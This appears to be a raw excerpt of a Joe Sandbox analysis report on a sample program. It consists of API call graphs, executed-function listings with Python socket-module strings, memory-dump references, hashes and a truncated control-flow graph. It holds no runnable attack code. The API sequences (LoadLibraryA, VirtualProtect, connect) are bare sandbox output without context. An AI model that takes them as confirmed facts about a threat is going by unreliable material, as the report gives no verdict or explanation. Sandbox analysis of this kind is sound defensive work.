7ff72c66546c EnterCriticalSection 63515->63523 63518 7ff72c65fe88 63519 7ff72c65fea4 72 API calls 63518->63519 63520 7ff72c65fe94 63519->63520 63521 7ff72c665478 _fread_nolock LeaveCriticalSection 63520->63521 63521->63522 63522->62989 63524->63522 63525->63006 63527 7ffbaa4956e8 63528 7ffbaa4956ff 63527->63528 63532 7ffbaa49573d 63527->63532 63529 7ffbaa495712 closesocket 63528->63529 63530 7ffbaa495729 63529->63530 63531 7ffbaa495732 00007FFBC92E3440 63530->63531 63530->63532 63531->63532 63533 7ffba6815220 63534 7ffba6815258 63533->63534 63536 7ffba68152ae 63533->63536 63536->63534 63537 7ffba6814c70 63536->63537 63539 7ffba6814ce4 63537->63539 63538 7ffba6814ef4 00007FFBBB593010 63541 7ffba6814f14 63538->63541 63539->63538 63540 7ffba6814d5f 63539->63540 63539->63541 63540->63536 63542 7ffba6814fa5 00007FFBBB593010 63541->63542 63544 7ffba6814fba 63541->63544 63542->63544 63544->63540 63545 7ffba67b3790 63544->63545 63548 7ffba67b37c7 63545->63548 63546 7ffba67b3829 63546->63544 63548->63546 63549 7ffba67b3370 63548->63549 63550 7ffba67b3381 63549->63550 63551 7ffba67b33a2 63550->63551 63553 7ffba67aa0d0 63550->63553 63551->63548 63554 7ffba67aa125 63553->63554 63556 7ffba67aa0f2 63553->63556 63554->63556 63557 7ffba67a8050 63554->63557 63556->63551 63558 7ffba67a807f 63557->63558 63559 7ffba67a809c 63558->63559 63561 7ffba679d9e0 63558->63561 63559->63556 63562 7ffba679da0d 63561->63562 63567 7ffba679da5a 63561->63567 63563 7ffba679da43 00007FFBBB593010 63562->63563 63564 7ffba679da23 00007FFBBB593010 63562->63564 63563->63567 63566 7ffba679da28 63564->63566 63565 7ffba679da83 ReadFile 63565->63566 63565->63567 63566->63559 63567->63565 63567->63566 63568 7ffbaa4953dc 63575 7ffbaa4940f0 63568->63575 63571 7ffbaa49549a 63572 7ffbaa49541c 63573 7ffbaa49544c bind 63572->63573 63574 7ffbaa49546e 63572->63574 63573->63574 63593 7ffbaa4929f0 IsProcessorFeaturePresent capture_previous_context 63574->63593 63576 7ffbaa494123 63575->63576 63579 7ffbaa4943fe 63575->63579 63577 7ffbaa49412c 63576->63577 63578 7ffbaa4942f9 63576->63578 63581 7ffbaa494285 63577->63581 63584 7ffbaa494135 63577->63584 63592 7ffbaa49413a 63578->63592 63595 7ffbaa494f74 8 API calls 63578->63595 63579->63592 63596 7ffbaa494f74 8 API calls 63579->63596 63581->63592 63594 7ffbaa494e88 00007FFBC92F4340 63581->63594 63589 7ffbaa494215 UuidFromStringW 63584->63589 63584->63592 63585 7ffbaa4944b7 63586 7ffbaa4944eb htons 63585->63586 63585->63592 63586->63592 63587 7ffbaa494382 63588 7ffbaa4943cf htons htonl 63587->63588 63587->63592 63588->63592 63590 7ffbaa49422d 63589->63590 63591 7ffbaa494258 UuidFromStringW 63590->63591 63590->63592 63591->63592 63592->63572 63593->63571 63594->63592 63595->63587 63596->63585 63597 7ffba61015a0 63598 7ffba61015b8 63597->63598 63599 7ffba61016c6 63598->63599 63601 7ffba6091c1c 63598->63601 63601->63598 63603 7ffba60d6e20 63601->63603 63604 7ffba60d6eec 63603->63604 63608 7ffba6091a0f 63603->63608 63616 7ffba60914bf 63603->63616 63620 7ffba60ef070 63603->63620 63624 7ffba6091df7 63603->63624 63604->63598 63608->63603 63609 7ffba60dab70 63608->63609 63610 7ffba60db8e1 00007FFBC92F6570 63609->63610 63615 7ffba60dace7 63609->63615 63611 7ffba60db906 00007FFBC92F6570 63610->63611 63610->63615 63612 7ffba60db926 00007FFBC92F6570 63611->63612 63611->63615 63613 7ffba60db93d 00007FFBC92F6570 63612->63613 63612->63615 63614 7ffba60db957 00007FFBC92F6570 63613->63614 63613->63615 63614->63615 63615->63603 63616->63603 63617 7ffba60ee960 63616->63617 63618 7ffba60ef1c1 SetLastError 63617->63618 63619 7ffba60ef1d5 63617->63619 63618->63619 63619->63603 63621 7ffba60ef180 63620->63621 63622 7ffba60ef1c1 SetLastError 63621->63622 63623 7ffba60ef1d5 63621->63623 63622->63623 63623->63603 63624->63603 63625 7ffba60eeaa0 63624->63625 63626 7ffba60ef1c1 SetLastError 63625->63626 63627 7ffba60ef1d5 63625->63627 63626->63627 63627->63603 63628 7ffba67a1230 GetSystemInfo 63629 7ffba67a1264 63628->63629 63630 7ffbaa495754 63631 7ffbaa4940f0 14 API calls 63630->63631 63632 7ffbaa495794 63631->63632 63636 7ffbaa4957ce 63632->63636 63637 7ffbaa4947a0 63632->63637 63634 7ffbaa4957ed 63651 7ffbaa4929f0 IsProcessorFeaturePresent capture_previous_context 63636->63651 63638 7ffbaa499568 63637->63638 63639 7ffbaa4947c4 connect 63638->63639 63640 7ffbaa4947e2 63639->63640 63641 7ffbaa494826 63640->63641 63642 7ffbaa4947ea WSAGetLastError WSAGetLastError 63640->63642 63641->63636 63644 7ffbaa494803 63642->63644 63643 7ffbaa494816 63643->63641 63645 7ffbaa49481b WSASetLastError 63643->63645 63644->63641 63644->63643 63646 7ffbaa49483e 63644->63646 63645->63641 63647 7ffbaa494873 63646->63647 63648 7ffbaa49485a 63646->63648 63650 7ffbaa4954ac 10 API calls 63647->63650 63649 7ffbaa4954ac 10 API calls 63648->63649 63649->63641 63650->63641 63651->63634 63652 7ffbaa496654 63653 7ffbaa4966a5 63652->63653 63655 7ffbaa4966b3 63653->63655 63656 7ffbaa4965ac 63653->63656 63657 7ffbaa4965b5 63656->63657 63658 7ffbaa4965b9 63656->63658 63657->63655 63659 7ffbaa4954ac 10 API calls 63658->63659 63659->63657 63660 7ff72c665628 63661 7ff72c66565f 63660->63661 63662 7ff72c665642 63660->63662 63661->63662 63664 7ff72c665672 CreateFileW 63661->63664 63685 7ff72c664ee8 11 API calls _get_daylight 63662->63685 63666 7ff72c6656dc 63664->63666 63667 7ff72c6656a6 63664->63667 63665 7ff72c665647 63686 7ff72c664f08 11 API calls _get_daylight 63665->63686 63689 7ff72c665c04 46 API calls 3 library calls 63666->63689 63688 7ff72c66577c 59 API calls 3 library calls 63667->63688 63671 7ff72c6656e1 63674 7ff72c6656e5 63671->63674 63675 7ff72c665710 63671->63675 63672 7ff72c66564f 63687 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63672->63687 63673 7ff72c6656b4 63677 7ff72c6656bb CloseHandle 63673->63677 63678 7ff72c6656d1 CloseHandle 63673->63678 63690 7ff72c664e7c 11 API calls 2 library calls 63674->63690 63691 7ff72c6659c4 51 API calls 63675->63691 63681 7ff72c66565a 63677->63681 63678->63681 63682 7ff72c66571d 63692 7ff72c665b00 21 API calls _fread_nolock 63682->63692 63684 7ff72c6656ef 63684->63681 63685->63665 63686->63672 63687->63681 63688->63673 63689->63671 63690->63684 63691->63682 63692->63684 63693 7ffba66a91b8 63696 7ffba66a91c0 63693->63696 63694 7ffba66a91fc 63696->63694 63697 7ffba66a44e4 2 API calls 63696->63697 63698 7ffba66a4c3c WSAGetLastError 63696->63698 63697->63696 63698->63696 63699 7ffba43e1f40 63700 7ffba43e1f58 63699->63700 63707 7ffba43e2b20 63699->63707 63701 7ffba43e2a43 LoadLibraryA 63700->63701 63703 7ffba43e2a92 VirtualProtect VirtualProtect 63700->63703 63702 7ffba43e2a5d 63701->63702 63702->63700 63705 7ffba43e2a66 GetProcAddress 63702->63705 63703->63707 63705->63702 63706 7ffba43e2a87 63705->63706 63707->63707 63717 7ffba60b8150 63718 7ffba60b816a 63717->63718 63719 7ffba60b8180 63718->63719 63721 7ffba609112c 63718->63721 63721->63719 63722 7ffba609ef00 63721->63722 63725 7ffba609ef30 63722->63725 63724 7ffba609ef1a 63724->63719 63726 7ffba6091325 63725->63726 63727 7ffba609ef50 SetLastError 63726->63727 63728 7ffba609ef70 63727->63728 63730 7ffba6091c1c 8 API calls 63728->63730 63729 7ffba609efac 63729->63724 63730->63729 63731 7ffba60d5c00 63732 7ffba60d5c1d 63731->63732 63733 7ffba60d5d23 63732->63733 63735 7ffba60d5d3e 63732->63735 63734 7ffba609127b SetLastError 63733->63734 63736 7ffba60d5d39 63734->63736 63735->63736 63738 7ffba609127b 63735->63738 63738->63736 63740 7ffba60d8a40 63738->63740 63739 7ffba60d8ac3 SetLastError 63739->63740 63741 7ffba60d8b27 63739->63741 63740->63739 63740->63741 63741->63736 63742 7ffba67f0d10 63743 7ffba67f0d3c 63742->63743 63745 7ffba67f0d41 63742->63745 63746 7ffba6814960 63743->63746 63747 7ffba6814979 63746->63747 63749 7ffba6814985 63746->63749 63750 7ffba6814890 63747->63750 63749->63745 63751 7ffba68148ca 63750->63751 63754 7ffba68148da 63750->63754 63756 7ffba68143d0 63751->63756 63753 7ffba681492d 63753->63749 63754->63753 63755 7ffba68143d0 4 API calls 63754->63755 63755->63754 63757 7ffba681448c 63756->63757 63758 7ffba67b3790 3 API calls 63757->63758 63759 7ffba68144ba 63757->63759 63760 7ffba6814514 63758->63760 63759->63754 63760->63759 63761 7ffba681454f 00007FFBBB593010 63760->63761 63761->63759 63762 7ff72c65bae0 63763 7ff72c65bb0e 63762->63763 63764 7ff72c65baf5 63762->63764 63764->63763 63767 7ff72c66d5fc 63764->63767 63768 7ff72c66d647 63767->63768 63772 7ff72c66d60b _get_daylight 63767->63772 63775 7ff72c664f08 11 API calls _get_daylight 63768->63775 63769 7ff72c66d62e HeapAlloc 63771 7ff72c65bb6e 63769->63771 63769->63772 63772->63768 63772->63769 63774 7ff72c673590 EnterCriticalSection LeaveCriticalSection _get_daylight 63772->63774 63774->63772 63775->63771 63776 7ffbaa4910c0 WSAStartup 63777 7ffbaa491102 00007FFBAA6A082C 63776->63777 63780 7ffbaa49283e 63776->63780 63781 7ffbaa491135 63777->63781 63779 7ffbaa492850 63785 7ffbaa4929f0 IsProcessorFeaturePresent capture_previous_context 63780->63785 63781->63780 63782 7ffbaa4927a7 VerSetConditionMask VerSetConditionMask VerSetConditionMask 63781->63782 63783 7ffbaa4927f7 VerifyVersionInfoA 63782->63783 63783->63780 63784 7ffbaa492814 63783->63784 63784->63780 63784->63783 63785->63779 63786 7ff72c652fe0 63787 7ff72c652ff0 63786->63787 63788 7ff72c65302b 63787->63788 63789 7ff72c653041 63787->63789 63814 7ff72c652710 54 API calls _log10_special 63788->63814 63791 7ff72c653061 63789->63791 63802 7ff72c653077 __std_exception_copy 63789->63802 63815 7ff72c652710 54 API calls _log10_special 63791->63815 63793 7ff72c65c550 _log10_special 8 API calls 63795 7ff72c6531fa 63793->63795 63794 7ff72c653037 __std_exception_copy 63794->63793 63796 7ff72c651470 116 API calls 63796->63802 63797 7ff72c653349 63822 7ff72c652710 54 API calls _log10_special 63797->63822 63798 7ff72c651c80 49 API calls 63798->63802 63800 7ff72c653333 63821 7ff72c652710 54 API calls _log10_special 63800->63821 63802->63794 63802->63796 63802->63797 63802->63798 63802->63800 63803 7ff72c65330d 63802->63803 63805 7ff72c653207 63802->63805 63820 7ff72c652710 54 API calls _log10_special 63803->63820 63806 7ff72c653273 63805->63806 63816 7ff72c66a404 37 API calls 2 library calls 63805->63816 63808 7ff72c65329e 63806->63808 63809 7ff72c653290 63806->63809 63818 7ff72c652dd0 37 API calls 63808->63818 63817 7ff72c66a404 37 API calls 2 library calls 63809->63817 63812 7ff72c65329c 63819 7ff72c652500 54 API calls __std_exception_copy 63812->63819 63814->63794 63815->63794 63816->63806 63817->63812 63818->63812 63819->63794 63820->63794 63821->63794 63822->63794 63823 7ffbaa4b7700 63824 7ffbaa4b7719 63823->63824 63825 7ffbaa4b777a 00007FFBAA5AD8D8 63823->63825 63828 7ffbaa4b7a80 63824->63828 63825->63824 63827 7ffbaa4b7722 63829 7ffbaa4b7a85 63828->63829 63830 7ffbaa4b7aac 63828->63830 63829->63830 63831 7ffbaa4b7a24 00007FFBC92DF020 63829->63831 63830->63827 63832 7ffbaa4b7a9f 63831->63832 63833 7ffbaa4b7b7c 00007FFBC92DF020 63832->63833 63833->63830 63834 7ffba60afd40 63835 7ffba60afd50 63834->63835 63836 7ffba60afd62 63835->63836 63837 7ffba6091df7 SetLastError 63835->63837 63838 7ffba60ef070 SetLastError 63835->63838 63839 7ffba60914bf SetLastError 63835->63839 63837->63836 63838->63836 63839->63836 63840 7ffba67b2250 63844 7ffba67b22ab 63840->63844 63841 7ffba67b2408 63846 7ffba67b23c4 63841->63846 63848 7ffba67a92b0 63841->63848 63843 7ffba67b2665 63843->63846 63847 7ffba679d9e0 3 API calls 63843->63847 63844->63841 63845 7ffba67b23fd 00007FFBBB593010 63844->63845 63844->63846 63845->63841 63847->63846 63849 7ffba67a9335 63848->63849 63857 7ffba67a9390 63848->63857 63850 7ffba67a95c2 63849->63850 63852 7ffba67a9375 00007FFBBB593010 63849->63852 63849->63857 63850->63843 63851 7ffba67a9455 00007FFBBB593010 63853 7ffba67a9477 00007FFBBB593010 63851->63853 63854 7ffba67a962b 63851->63854 63852->63857 63855 7ffba67a962e 00007FFBBB593010 00007FFBBB593010 63853->63855 63854->63855 63856 7ffba67a9679 63855->63856 63856->63850 63859 7ffba679ffd0 63856->63859 63857->63850 63857->63851 63857->63856 63857->63857 63861 7ffba67a0021 63859->63861 63860 7ffba67a01f0 CreateFileW 63860->63861 63861->63860 63862 7ffba67a03a8 63861->63862 63862->63850

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FFBAA491091 Relevance: 349.5, APIs: 6, Strings: 193, Instructions: 1276networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConditionMask$00007A082InfoStartupVerifyVersion
                                                                                                                                                                                                                                  • String ID: 00000000-0000-0000-0000-000000000000$00:00:00:00:00:00$00:00:00:FF:FF:FF$90DB8B89-0D35-4F79-8CE9-49EA0AC8B7CD$A42E7CDA-D03F-480C-9CC2-A4DE20ABB878$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_HYPERV$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$E0E16197-DD56-4A10-9195-5EE7A155A838$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF$HVSOCKET_ADDRESS_FLAG_PASSTHRU$HVSOCKET_CONNECTED_SUSPEND$HVSOCKET_CONNECT_TIMEOUT$HVSOCKET_CONNECT_TIMEOUT_MAX$HV_GUID_BROADCAST$HV_GUID_CHILDREN$HV_GUID_LOOPBACK$HV_GUID_PARENT$HV_GUID_WILDCARD$HV_GUID_ZERO$HV_PROTOCOL_RAW$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_ADD_SOURCE_MEMBERSHIP$IP_BLOCK_SOURCE$IP_DROP_MEMBERSHIP$IP_DROP_SOURCE_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_PKTINFO$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$IP_UNBLOCK_SOURCE$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket.gaierror$socket.herror$timeout
                                                                                                                                                                                                                                  • API String ID: 3409425757-1188461360
                                                                                                                                                                                                                                  • Opcode ID: 4dce1cfbc17b3c99d7e4a2bf2870c05e4680d8e1b4ef0cfb511a93ced94c5d55
                                                                                                                                                                                                                                  • Instruction ID: 13a80daa33a126a4a18bef59b45fe4f6377ff81a0f080e7532bd6014b26a58b3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4dce1cfbc17b3c99d7e4a2bf2870c05e4680d8e1b4ef0cfb511a93ced94c5d55
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FD202A0B0A713C1F6128F36E8C06AD175C9F46F94F8415B9ED0E46261DF6EE26BC361
                                                                                                                                                                                                                                  Function 00007FFBAA4910C0 Relevance: 344.2, APIs: 6, Strings: 190, Instructions: 1239networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConditionMask$00007A082InfoStartupVerifyVersion
                                                                                                                                                                                                                                  • String ID: 00000000-0000-0000-0000-000000000000$00:00:00:00:00:00$00:00:00:FF:FF:FF$90DB8B89-0D35-4F79-8CE9-49EA0AC8B7CD$A42E7CDA-D03F-480C-9CC2-A4DE20ABB878$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_HYPERV$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$E0E16197-DD56-4A10-9195-5EE7A155A838$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF$HVSOCKET_ADDRESS_FLAG_PASSTHRU$HVSOCKET_CONNECTED_SUSPEND$HVSOCKET_CONNECT_TIMEOUT$HVSOCKET_CONNECT_TIMEOUT_MAX$HV_GUID_BROADCAST$HV_GUID_CHILDREN$HV_GUID_LOOPBACK$HV_GUID_PARENT$HV_GUID_WILDCARD$HV_GUID_ZERO$HV_PROTOCOL_RAW$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_ADD_SOURCE_MEMBERSHIP$IP_BLOCK_SOURCE$IP_DROP_MEMBERSHIP$IP_DROP_SOURCE_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_PKTINFO$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$IP_UNBLOCK_SOURCE$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$_socket.CAPI$error$gaierror$has_ipv6$herror$socket.gaierror$socket.herror$timeout
                                                                                                                                                                                                                                  • API String ID: 3409425757-3643889990
                                                                                                                                                                                                                                  • Opcode ID: 402a8c535e09a4f8d89ed768b117a8b9010c23cdf2382df9e6d88d85c51fdd0b
                                                                                                                                                                                                                                  • Instruction ID: 45e393286e2def3153e33a02d52c4f757555e515654a6cc8226df130892a5d8e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 402a8c535e09a4f8d89ed768b117a8b9010c23cdf2382df9e6d88d85c51fdd0b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EC202A0B0A713C1F6128F36E8C06AD175C9F45F94F8415B9ED0E46261DF6EE26BC361
                                                                                                                                                                                                                                  Function 00007FF72C651000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1205 7ff72c651000-7ff72c653806 call 7ff72c65fe18 call 7ff72c65fe20 call 7ff72c65c850 call 7ff72c6653f0 call 7ff72c665484 call 7ff72c6536b0 1219 7ff72c653808-7ff72c65380f 1205->1219 1220 7ff72c653814-7ff72c653836 call 7ff72c651950 1205->1220 1221 7ff72c653c97-7ff72c653cb2 call 7ff72c65c550 1219->1221 1225 7ff72c65391b-7ff72c653931 call 7ff72c6545c0 1220->1225 1226 7ff72c65383c-7ff72c653856 call 7ff72c651c80 1220->1226 1233 7ff72c65396a-7ff72c65397f call 7ff72c652710 1225->1233 1234 7ff72c653933-7ff72c653960 call 7ff72c657f90 1225->1234 1230 7ff72c65385b-7ff72c65389b call 7ff72c658830 1226->1230 1239 7ff72c65389d-7ff72c6538a3 1230->1239 1240 7ff72c6538c1-7ff72c6538cc call 7ff72c664f30 1230->1240 1242 7ff72c653c8f 1233->1242 1246 7ff72c653984-7ff72c6539a6 call 7ff72c651c80 1234->1246 1247 7ff72c653962-7ff72c653965 call 7ff72c66004c 1234->1247 1243 7ff72c6538a5-7ff72c6538ad 1239->1243 1244 7ff72c6538af-7ff72c6538bd call 7ff72c6589a0 1239->1244 1254 7ff72c6539fc-7ff72c653a2a call 7ff72c658940 call 7ff72c6589a0 * 3 1240->1254 1255 7ff72c6538d2-7ff72c6538e1 call 7ff72c658830 1240->1255 1242->1221 1243->1244 1244->1240 1257 7ff72c6539b0-7ff72c6539b9 1246->1257 1247->1233 1281 7ff72c653a2f-7ff72c653a3e call 7ff72c658830 1254->1281 1262 7ff72c6538e7-7ff72c6538ed 1255->1262 1263 7ff72c6539f4-7ff72c6539f7 call 7ff72c664f30 1255->1263 1257->1257 1261 7ff72c6539bb-7ff72c6539d8 call 7ff72c651950 1257->1261 1261->1230 1273 7ff72c6539de-7ff72c6539ef call 7ff72c652710 1261->1273 1266 7ff72c6538f0-7ff72c6538fc 1262->1266 1263->1254 1270 7ff72c6538fe-7ff72c653903 1266->1270 1271 7ff72c653905-7ff72c653908 1266->1271 1270->1266 1270->1271 1271->1263 1274 7ff72c65390e-7ff72c653916 call 7ff72c664f30 1271->1274 1273->1242 1274->1281 1284 7ff72c653a44-7ff72c653a47 1281->1284 1285 